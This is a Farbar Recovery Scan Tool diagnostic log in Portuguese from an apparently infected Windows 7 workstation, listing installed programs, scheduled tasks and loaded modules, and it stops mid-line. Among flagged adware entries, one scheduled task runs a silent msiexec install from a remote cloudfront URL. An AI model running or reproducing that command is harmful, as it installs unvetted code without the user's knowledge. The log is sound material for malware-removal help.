Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 12-02-2017 Executado por gustavo.ukita (13-02-2017 12:34:48) Executando a partir de C:\Users\gustavo.ukita.SYSMAP\Downloads Windows 7 Professional Service Pack 1 (X64) (2016-06-15 16:55:23) Modo da Inicialização: Normal ========================================================== ==================== Contas: ============================= Administrador (S-1-5-21-1345716505-4278138296-1268146239-500 - Administrator - Disabled) Convidado (S-1-5-21-1345716505-4278138296-1268146239-501 - Limited - Disabled) ==================== Central de Segurança ======================== (Se uma entrada for incluída na fixlist, será removida.) AV: Kaspersky Endpoint Security 10 para Windows (Enabled - Up to date) {B41C7598-35F6-4D89-7D0E-7ADE69B4047B} AS: Kaspersky Endpoint Security 10 para Windows (Enabled - Up to date) {0F7D947C-13CC-4207-47BE-41AC12334EC6} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Kaspersky Endpoint Security 10 para Windows (Disabled) {8C27F4BD-7F99-4CD1-5651-D3EB97674300} ==================== Programas Instalados ====================== (Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.) Active Directory Authentication Library for SQL Server (Version: 13.0.1601.5 - Microsoft Corporation) Hidden Active Directory Authentication Library for SQL Server (x86) (x32 Version: 13.0.1601.5 - Microsoft Corporation) Hidden Adobe Flash Player 23 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Flash Player 24 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 24.0.0.186 - Adobe Systems Incorporated) Adobe Reader 9.3 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A93000000001}) (Version: 9.3.0 - Adobe Systems Incorporated) Advanced SystemCare 10 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 10.1.0 - IObit) ALM-Platform Loader 12.2x (HKLM-x32\...\{CAACBB9E-39D7-4708-AB20-9840EA0829A7}) (Version: 12.20.3424.0 - HP) Aplicativo Itaú (HKLM-x32\...\{A43DE586-3B07-4DC2-B40B-5D5C89B72931}) (Version: 1.0.70 - Banco Itaú) Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation) Astah Community 7_0_0 (HKLM\...\astah* community_is1) (Version: - Change Vision, Inc.) Atom (HKU\S-1-5-21-1570781029-660524082-555581952-15129\...\atom) (Version: 1.13.1 - GitHub Inc.) Azure AD Authentication Connected Service (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden Bizagi Process Modeler (HKLM-x32\...\InstallShield_{998852A0-ECD5-4A32-94DC-7169D0CE68EF}) (Version: 2.7.02 - Bizagi Limited) Bizagi Process Modeler (x32 Version: 2.7.02 - Bizagi Limited) Hidden Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden Brother MFL-Pro Suite MFC-8890DW (HKLM-x32\...\{004B8D14-7E3A-490A-ABB3-753535E169E3}) (Version: 1.0.5.0 - Brother Industries, Ltd.) CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform) Cisco Systems VPN Client 5.0.07.0290 (HKLM\...\{467D5E81-8349-4892-9E81-C3674ED8E451}) (Version: 5.0.7 - Cisco Systems, Inc.) Conexant SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.54.37.0 - Conexant) Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.) Dotfuscator and Analytics Community Edition 5.22.0 (x32 Version: 5.22.0.3788 - PreEmptive Solutions) Hidden Driver Booster 4.2 (HKLM-x32\...\Driver Booster_is1) (Version: 4.2.0 - IObit) Entity Framework 6.1.3 Tools for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation) Git version 2.10.0 (HKLM\...\Git_is1) (Version: 2.10.0 - The Git Development Community) HHD Software Hex Editor Neo 6.21 (HKLM\...\{8EB85C0E-DE7D-4A53-BD66-708B8F2C80B0}) (Version: 6.21.0.5841 - HHD Software, Ltd.) HipChat (HKLM-x32\...\{1E58E3D7-8943-4BF1-BADD-BF471506B684}_is1) (Version: 4.29.1662 - Atlassian Inc) HostSwitcher 1.1.0.0 (HKLM-x32\...\{D092D8DC-5D8C-4EB8-A0DB-B7856E3D1C23}_is1) (Version: 1.1.0.0 - Michael Sorens) IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation) IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version: - ) IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version: - ) Informatica 9.6.1 (HKLM\...\Informatica 9.6.1) (Version: 9.6.1.0 - Informatica) Informatica 9.6.1 Client (HKLM-x32\...\Informatica 9.6.1 Client) (Version: 9.6.1.0 - Informatica) Informatica Mapping Template (HKLM-x32\...\{51B84FE5-B216-4ED8-9FDA-262AC8E0164F}) (Version: 1.0.0 - Informatica Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4358 - Intel Corporation) IObit Malware Fighter 4 (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 4.5 - IObit) IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 6.2.0.934 - IObit) Java 7 Update 79 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417079FF}) (Version: 7.0.790 - Oracle) Java 8 Update 111 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Java 8 Update 66 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418066F0}) (Version: 8.0.660.17 - Oracle Corporation) Java SE Development Kit 7 Update 79 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170790}) (Version: 1.7.0.790 - Oracle) Java SE Development Kit 8 Update 66 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180660}) (Version: 8.0.660.17 - Oracle Corporation) Java(TM) 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle) Java(TM) SE Development Kit 6 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0160450}) (Version: 1.6.0.450 - Oracle) Kaspersky Endpoint Security 10 para Windows (HKLM-x32\...\{7A4192A1-84C4-4E90-A31B-B4847CA8E23A}) (Version: 10.2.5.3201 - Kaspersky Lab) Kaspersky Security Center 10 Network Agent (HKLM-x32\...\InstallWIX_{0F05E4E5-5A89-482C-9A62-47CC58643788}) (Version: 10.3.407 - AO Kaspersky Lab) Kaspersky Security Center 10 Network Agent (x32 Version: 10.3.407 - AO Kaspersky Lab) Hidden Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation) Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation) Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation) Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation) Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation) Microsoft Help Viewer 1.1 Language Pack - PTB (HKLM\...\Microsoft Help Viewer 1.1 Language Pack - PTB) (Version: 1.1.40219 - Microsoft Corporation) Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation) Microsoft Lync Basic 2013 (HKLM\...\Office15.LYNCENTRY) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft ODBC Driver 11 for SQL Server (HKLM\...\{20E2E968-1498-4B9C-AFF2-5F8C13E46FD7}) (Version: 12.0.2000.8 - Microsoft Corporation) Microsoft Office 365 Business - pt-br (HKLM\...\O365BusinessRetail - pt-br) (Version: 16.0.7466.2017 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM-x32\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation) Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version: - Microsoft Corporation) Microsoft Visual Studio 2010 Shell (Isolated) - PTB (HKLM-x32\...\{37C82C0C-4B8A-36A9-B470-8A2F531EBC18}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio Community 2015 with Updates (HKLM-x32\...\{79b486b9-c5f0-4096-a00c-8351f59587c2}) (Version: 14.0.25420.1 - Microsoft Corporation) Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation) Mozilla Firefox 51.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 pt-BR)) (Version: 51.0.1 - Mozilla) MSBuild/NuGet Integration 14.0 (x86) (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{A8D93648-9F7F-407D-915C-62044644C3DA}) (Version: 8.0.50727.42 - The Firebird Project) MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{EBFC96E5-4409-426E-88B7-650ADB342E78}) (Version: 8.0.50727.42 - The Firebird Project) Multi-Device Hybrid Apps using C# - Templates - ENU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9 - Notepad++ Team) OCS Inventory Agent 4.0.6.1 (HKLM-x32\...\OCS Inventory Agent) (Version: 4.0.6.1 - OCS Inventory NG Team) Office 16 Click-to-Run Extensibility Component (Version: 16.0.7466.2017 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (Version: 16.0.7466.2017 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (Version: 16.0.7466.2017 - Microsoft Corporation) Hidden One System Care (HKLM-x32\...\OneSystemCare) (Version: 4.4.0.3 - OneSystemCare) <==== ATENÇÃO OtherSearch (HKLM-x32\...\OtherSearch) (Version: 4.0.0.0 - Skyler Emil) <==== ATENÇÃO Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation) PL/SQL Developer 9.0.1.1613 (HKLM-x32\...\PL/SQL Developer [A1B07346]) (Version: 9.0.1.1613 - Allround Automations) PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden Prerequisites for SSDT (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation) Prerequisites for SSDT (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation) Proteção de Terminal Trusteer (HKLM-x32\...\Rapport_msi) (Version: 3.5.1804.75 - Trusteer) PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden Quest Installer (HKLM-x32\...\Quest Installer) (Version: - ) Rapport (x32 Version: 3.5.1804.75 - Trusteer) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31228 - Realtek Semiconductor Corp.) Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 7.54.309.2012 - Realtek) Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden Roslyn Language Services - x86 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden Roslyn Language Services - x86 (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden Samsung Kies (x32 Version: 2.6.4.16061.19 - Samsung Electronics Co., Ltd.) Hidden Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.) Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation) Skype for Business Basic 2016 - pt-br (HKLM\...\SkypeforBusinessEntryRetail - pt-br) (Version: 16.0.7466.2017 - Microsoft Corporation) Skype Meetings App (HKLM-x32\...\{69A802E3-8264-43D0-B160-6D25CD7AFB1A}) (Version: 16.2.0.96 - Microsoft Corporation) Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.4.0 - IObit) SoapUI 5.2.1 5.2.1 (HKLM\...\5517-2803-0637-4585) (Version: 5.2.1 - SmartBear Software) Software de dispositivo do Chipset Intel® (x32 Version: 10.1.1.13 - Intel(R) Corporation) Hidden SourceTree (HKLM-x32\...\SourceTree 1.9.10.0) (Version: 1.9.10.0 - Atlassian) SourceTree (x32 Version: 1.9.10.0 - Atlassian) Hidden Team Explorer for Microsoft Visual Studio 2015 Update 3 CTP1 (x32 Version: 14.98.25331 - Microsoft) Hidden TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.59518 - TeamViewer) Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden Toad for Oracle (HKLM-x32\...\{D6C757FF-2189-46C3-9528-8864B069B192}) (Version: 9.5 - Quest Software, Inc.) TortoiseSVN 1.8.10.26129 (64 bit) (HKLM\...\{A9E679EC-8FD4-49D8-A5A5-ACE462515A9E}) (Version: 1.8.26129 - TortoiseSVN) TypeScript Power Tool (x32 Version: 1.8.34.0 - Microsoft Corporation) Hidden TypeScript Tools for Microsoft Visual Studio 2015 (x32 Version: 1.8.35.0 - Microsoft Corporation) Hidden Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation) Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.LYNCENTRY_{2BA6245D-FBB9-42F6-AFD9-C0DC52763AD5}) (Version: - Microsoft) Visual Studio 2010 Prerequisites - English (HKLM\...\{45DAD85A-A8D6-3E01-B28C-F7791661A717}) (Version: 10.0.30319 - Microsoft Corporation) Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation) VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN) VS Update core components (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden vs_update3notification (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden Warsaw 1.14.2.35 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.14.2.35 - GAS Tecnologia) WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden WinMerge 2.14.0 (HKLM-x32\...\WinMerge_is1) (Version: 2.14.0 - Thingamahoochie Software) WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) WinSnare (HKLM-x32\...\{54A54A73-D8CF-4EBF-BEA7-AD6507ACE4C5}) (Version: 4.1.0 - WinSnare) <==== ATENÇÃO Wisdom-soft ScreenHunter 6.0 Free (HKLM-x32\...\Wisdom-soft ScreenHunter 6.0 Free) (Version: - Wisdom Software Inc.) ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {106CA8F6-EDD1-4BBD-B14D-EA7FF18FA38E} - System32\Tasks\Phervackprivch => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD7500BPKT-75PK4T0_WD-WX81C52H3501H3501&v=201726 /q Task: {120982E6-ED32-4572-9918-BA884F74C148} - System32\Tasks\WIXDtJkRAY => C:\Program Files (x86)\zTJM6VlzI0\updengine.exe [2017-02-04] () <==== ATENÇÃO Task: {129D239D-F1C6-45F0-B6A8-F733BA009660} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2016-10-19] (Microsoft Corporation) Task: {1345FF03-AF3E-4104-9E29-BC078B2A5253} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Home\Programas\VisualStudio\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation) Task: {171682E3-879A-47B5-9243-56444A41DCD7} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-10-08] (Microsoft Corporation) Task: {1ACB7D9F-3CE3-4660-A06C-D23C81609552} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd) Task: {3EA0048E-2E7A-4790-916C-82FCC87978AD} - System32\Tasks\ASC10_SkipUac_gustavo.ukita => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2016-12-27] (IObit) Task: {4C248190-B62C-4268-8C8C-D536646FA76D} - System32\Tasks\ASC10_SkipUac_SISTEMA => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2016-12-27] (IObit) Task: {4F179DE6-14E1-49F6-B02A-CF0E56529337} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2016-07-22] (IObit) Task: {5361EC64-BCBB-4E3D-B6E8-FDC0D4B17010} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-10-08] (Microsoft Corporation) Task: {552D0DFC-17E8-4EF5-B769-15628FD8CED3} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [2016-12-05] (IObit) Task: {6202268B-AEDD-4913-A62B-5F137EBF7CA8} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation) Task: {625A09D4-CF6C-4F4E-8DD8-5683605AAF94} - System32\Tasks\Driver Booster SkipUAC (SISTEMA) => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\DriverBooster.exe [2017-01-10] (IObit) Task: {647A5A43-001E-468F-A4A2-B4BBA6B84D75} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATENÇÃO Task: {77C1862D-2BA4-4F19-8B84-52FD4DB6FA96} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\Scheduler.exe [2016-12-14] (IObit) Task: {79C9E642-AE66-448A-A8E6-5EFB53D7E905} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-13] () Task: {84118096-DD2B-47AB-9E23-638587046400} - System32\Tasks\Uninstaller_SkipUac_gustavo.ukita => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2017-01-19] (IObit) Task: {8CE4A264-EE5F-42D2-8D9F-475D5EE30952} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-02-07] (Adobe Systems Incorporated) Task: {9CCBB2EC-67DB-4DED-9707-871B135CA802} - System32\Tasks\SmartDefrag_Startup => C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe [2016-11-21] (IObit) Task: {F95249C5-348B-4BB4-A353-12548040EAB4} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe ==================== Atalhos ============================= (As entradas podem ser listadas para serem restauradas ou removidas.) ==================== Módulos Carregados (Whitelisted) ============== 2014-07-24 23:36 - 2014-07-24 23:36 - 00030208 _____ () C:\Windows\System32\LenovoSysCheck.dll 2017-02-06 11:55 - 2017-02-06 11:55 - 00308224 ____H () C:\Program Files (x86)\Nopury Engine\local64spl.dll 2014-12-17 22:31 - 2014-12-17 22:31 - 00076032 _____ () C:\Home\Programas\TortoiseSVN\bin\TortoiseStub.dll 2014-12-17 22:30 - 2014-12-17 22:30 - 00088832 _____ () C:\Home\Programas\TortoiseSVN\bin\libsasl.dll 2016-06-15 15:25 - 2005-04-22 14:36 - 00143360 ____N () C:\Windows\system32\BrSNMP64.dll 2014-07-24 23:36 - 2014-07-24 23:36 - 00030208 _____ () C:\Windows\system32\LenovoSysCheck.dll 2016-10-17 16:18 - 2016-12-02 21:30 - 01989960 _____ () C:\Home\Programas\Atlassian\HipChat4\HipChat.exe 2016-10-17 16:18 - 2016-09-02 15:24 - 00012800 _____ () C:\Home\Programas\Atlassian\HipChat4\QtWebEngineProcess.exe 2016-09-29 11:36 - 2010-11-16 18:54 - 00076800 _____ () C:\Home\Programas\HostSwitcher\HostSwitcher.exe 2015-02-10 15:12 - 2015-02-10 15:12 - 02210480 _____ () C:\Program Files\Microsoft Office\Office15\tmpod.dll 2014-05-21 13:23 - 2014-05-21 13:23 - 00027304 _____ () C:\Program Files\Microsoft Office\Office15\lynchtmlconvpxy.dll 2015-02-10 15:12 - 2015-02-10 15:12 - 08468640 _____ () C:\Program Files\Microsoft Office\Office15\lynchtmlconv.exe 2010-03-23 14:26 - 2010-03-23 14:26 - 00201512 _____ () C:\Program Files (x86)\Cisco Systems\VPN Client\vpnapi.dll 2015-06-02 14:51 - 2015-06-02 14:51 - 00545792 _____ () C:\Program Files (x86)\Trusteer\Rapport\bin\js32.dll 2017-02-04 12:03 - 2017-02-04 12:03 - 00503808 _____ () C:\Program Files (x86)\zTJM6VlzI0\kl.dll 2015-01-08 19:03 - 2015-01-08 19:03 - 01309880 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP1\kpcengine.2.2.dll 2017-02-07 11:24 - 2015-12-28 13:50 - 00899872 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\webres.dll 2017-02-07 11:24 - 2016-09-26 